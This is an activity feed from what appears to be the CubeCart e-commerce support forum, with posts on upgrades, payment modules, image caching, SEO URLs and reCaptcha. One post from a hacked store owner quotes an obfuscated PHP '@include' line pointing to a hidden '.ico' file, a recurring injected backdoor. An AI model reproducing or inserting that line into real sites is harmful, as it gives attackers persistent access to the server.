All Activity

This stream auto-updates     

1. Today
  2. According to the Bank Transfer module code, it does not ask CubeCart to send any emails - compared to POF that sends an email to the customer. But CubeCart not sending an Order Received email when the order goes to Pending is strange.
  3. yw - happens all the time - probably a third of all "problems" reported on here are because people havent done upgrades correctly, sometimes for many versions / months / years in a row !
  4. Thanks. For some reason the update from admin didn't work and I had to download V6.2.5 and upgrade manually. Once I had overwritten the files everything was working correctly again T
  5. Probably exactly the same reason - it is likely that you havent completed the upgrade correctly and have a mix of versions. Check how many versions of the admin directory and file you have and compare that against what you should be running and then ensure that directory and file are actually from 6.2.5
  6. Hi, I have the same problem. After updating to 6.2.4 the 'clear cache' button disappeared. I have since reinstalled and updated to 6.2.5 but the button still isn't there. Any idea why that might be? T
  7. Hi. I'm having a bit of a problem with this Extension. 1. After a customer checks out, it displays a screen with the following ------------------------------------------------------------------------------------ Amount Due A total of €26.95 is due for order number 190423-105827-6658 Your order will be completed once payment has been received. ----------------------------------------------------------------------------- The bank details for the customer to pay into do not show, although I have entered them in the Manage Extensions area in the admin area How does the client know who to pay? I would expect the bank details to show on screen or an email sent to the client with the bank details 2. I do not receive an email notification of the order, even though I have set "Order status for admin email notifications" to "Pending" Emails are working on the site when I do a test Please can you advise what I'm doing wrong Thanks Joel Hi - problem partially solved Although I had entered the bank details, etc, I hadn't entered the titles - e.g. Account Name, Account Number, etc. Once I entered the titles, it now shows on screen However, I'm still not receiving an email notification, so any help with that would be appreciated
  8. Yesterday
  9. Wonderful! I can confirm it worked. I will also do the search words and description later. Thank you very much indeed. Bill
  10. Welcome Bill_w! Glad to see you made it to the forums. For the browser title, please visit admin, Store Settings, Search Engines tab. Here, one can enter free-form text that will be supplied to the <head> section of a web page, including the Store Name for the browser <title> tag. This data item is different (if so desired) from the store name used in the contact info displayed to the visitor and printed in emails and other documents. For example, the browser <title> tag may be set to "Cylons-R-Us", but the real company name would be "Graystone Industries". This configuration data is stored in the database. (Note: Primatech Paper Company is one of several miscellaneous company names an earlier version of CubeCart used when initially going through setup.)
  11. Hi, I also have the same issue. I would like to try what you suggest as it will probably work. Trouble is I am not sure what the config array is. I get a good understanding of how programs work but the terminology does me. I have spent a few hours trawling through the files on my server but to no avail. I have not been able to find the code that is producing this paper company advert. It would help me agreat deal if you could explain a bit more to help me find the file it located in. I will have ago at the decoding and recoding myself. Thanks in advance. This is my first shot at any php stuff. Any help is very much appreciated thanks. Some of the source code from the published index page below . Bill << <!DOCTYPE html><html class="no-js" xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-GB"><head><title>Welcome to Network Review - Primatech Paper Company</title><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content=""><meta name="keywords" content=""><meta name="robots" content="index, follow"><meta name="generator" content="cubecart"><link href="http://www.networkreview.co.uk/index.php?" rel="canonical"><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon"><link href="//fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet" type='text/css'><link type="text/css" rel="stylesheet" href="/cache/32365.css.foundation_20190306090220.css"/><script type="text/javascript" src="/cache/32365.js_head.foundation_20190306090220.js" charset="utf-8"></script></head><body><svg display="none" version="1.1" >>
  12. When I go to my home page, it is blank...when I login to my godaddy hosting I notice although I created a static html page , an extra php page shows up with When I go through my cubecart folders, there are files with jibberish letters and php (example hygtjikp.(php)...inside those files are codes that look like <?php /*3cdad*/ @include "\057home\057agma\163sive\057publ\151c_ht\155l/li\156abcu\145pml\145s.co\155/sho\160-onl\151ne/i\156clud\145s/ac\145/.7b\1423900\142.ico"; /*3cdad*/ Multiple index files will have same code I have removed the files, Deleted the code, Updated to newest version, Changed folders, Renamed folders, but this hack keeps coming back
  13. I would have started a new topic, but I believe this problem has something to do with my update and moving directories. When I click on a product, one of three things happen. 1. Three small thumbnails of the product show up and no large image shows up. 2. No images at all show up. 3. Three small thumbnails of the product show up and a thumbnail size main image shows up. When I reload the page, everything is fine. If I use another browser, the same thing happens. If I use another computer, the same thing happens. Once I click on a product and reload that page, all images show from then on. As far as I can tell, nothing changes before or after the reload. The page source is identical. The URL is correct. In the page source, it's reading the image from /cache/image.jpg. I have cleared cache, images, sql, etc. No change. I've tried everything I can think of without success. Can anyone tell me what I need to do in order to correct this? Thanks
  14. Last week
  15. Super. I mainly use SumUp, but you don't have a checkout for them yet. So I've registered with Square, and activated my account with them. I'm setting up the cubecart side, Location ID, etc, is required. this information seems illusive within Square and cubecart is not one of the services offered when you click to connect a webstore within Square. Googling and going through my Square account hasn't found the info I need to set it up.
  16. Please examine the contents of the skin's config.xml file. CubeCart will create derivatives according to the size specified on the image's longest side. If the store is told to use a different skin (if allowed to do so via the storefront skin selector), that skin's config.xml file is parsed and sizes specified there are used to create derivations of the target image on demand. The URL to the 'source' image is given to Smarty, so it is up to the code in the skin to use it if desired. An image's dpi setting applies to conversions needed to print the image. I am not aware of browser's needing to respect an image's dpi value. A browser uses pixels and other HTML dimensionalities that can convert to pixels (percent, em, pt, etc).
  17. What does CubeCart do with an image when one is uploaded in the process of creating a new product? How many variations are created? Is the original image used in the live store? If an original image is 300dpi, then are any images in the live store 300dpi as well or does that change, and does it matter?
  18. Bug Report It has come to light that the Contact form on the Contact Us page is not submitting when Google reCaptcha V2 - Invisible is active. The issue appears to only affect the contact us page and only when the invisible option for Google reCaptcha V2. It's safe to assume the issue affects all purchases of Basix prior to today (21st May 2019) The issue has been fixed for the main package in the cubecart marketplace so will NOT affect any new purchases. To manually fix the issue please see the solution below: Solution File :: skins > basix > templates > content.contact.php Find the following on approx line 60 <input type="submit" class="btn btn-success g-recaptcha" id="contact_submit" value="{$LANG.documents.send_message}"> Replace it with <input type="submit" class="btn btn-success g-recaptcha" id="contact_submit" data-form-id="contact_form" value="{$LANG.documents.send_message}"> And that is all. Sorry for any inconvenience, Chris.
  19. The friendly URL will be a pattern consisting of just the product's name. But you need to have CubeCart dump all those previous names (see earlier post). If you do not want CubeCart to create a friendly name for you, you can enter in the text field whatever you want.
  20. As always, bsmither, you came though. So, my "Add category to product URL path?" is set to 'yes'. If set to 'no', what happens to the URL? Thank you very much. I really appreciate it.
  21. There is a setting in admin that has CubeCart automatically prepend the category path to the friendly name of the product. Such as: test-category-04/test-category-05/test-product-5 This is found at Store Settings, Search Engines tab, "Add category to product URL path?" The complete path is then databased. To clean all this out, in admin, Maintenance, Rebuild tab, check the " Clear all custom defined SEO URL's" and Submit.
  22. You could leave your store online and leave a message on front page informing customers and then just untick any payment processing module so that that they do not show or work so cannot accept any payments or orders.
  23. ... I´m talking about "send" button on contact form ... after reCaptcha confirmation-the form stays freezed - you can hit button how much you like - the form stays filled with information, and the button doesn´t react at all..... Without reCaptcha, everything works just fine. Would you like me to send you a private message with link to "contact-us" page? ps: - how I mentioned, this is happening only on this page after reCaptcha ... Thank you. K. R.
  24. Sorry to bother you nice folks, but I can't figure this one out. I added a new Category in Admin section. I'll call it 'B'.(number 6) My products were all under Category 'A'. (number 2). I went into the database and changed all cat_id to 6 from 2. Back in admin section, I confirmed all products were now in category 6. On the website, if I hover over the image of a product, it shows that it wants to append the old category to the URL. If I click on the picture, it has the old category in the URL and sometimes the picture doesn't appear until I reload the page. Sometimes the image appears very small until I reload the page. This happens on 3 different browsers. Again, products in admin show the new category while clicking on the product on the website shows the old category. I cleared cache, sql, and images. What did I miss? Sounds like I forgot to update something.
  25. It is impossible to give a definitive answer as it will be different for each site and even for different pages within each site, however, the generally accepted timeframe is that anything more than one to two days of downtime will affect rankings. Matt Cutts and John Mueller from Google have both made public statements about this previously. You would be much better off, keep the store open and putting up a prominent banner on all pages and changing customer order emails, stating that orders taken between X and Y dates will not be processed until Z date - that way you don’t lose ranking and hopefully not orders or future custom either Ian
  26. I am having issues with paypal gateway, it is returning customers to the cart missing the address. Has anyone else seen this issue?
  27. Does the error message say the mail was not sent, or actually that the reCaptcha failed? "the button on contact-us form" Which button? The reCaptcha or the "Send Message" button? Generally, if the visitor passes a reCaptcha test somewhere on your site, CubeCart remembers this and no further tests are required elsewhere on your site.
  1. Load more activity

• Newsletter

Want to keep up to date with all our latest news and information?